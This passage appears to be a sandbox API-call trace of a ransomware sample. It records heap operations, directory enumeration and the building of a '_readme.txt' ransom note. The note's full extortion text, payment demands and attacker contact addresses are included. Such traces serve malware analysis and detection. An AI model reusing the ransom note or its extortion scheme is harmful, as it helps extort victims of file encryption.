hHeap=0x6a0000) returned 1 [0175.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.069] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0175.069] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.069] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.069] PathFindFileNameW (pszPath="") returned="" [0175.069] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.070] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.070] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.070] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.070] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0175.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.070] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0175.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.072] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.072] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.072] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.073] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.074] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.074] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.074] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.074] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.075] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.091] RtlAllocateHeap 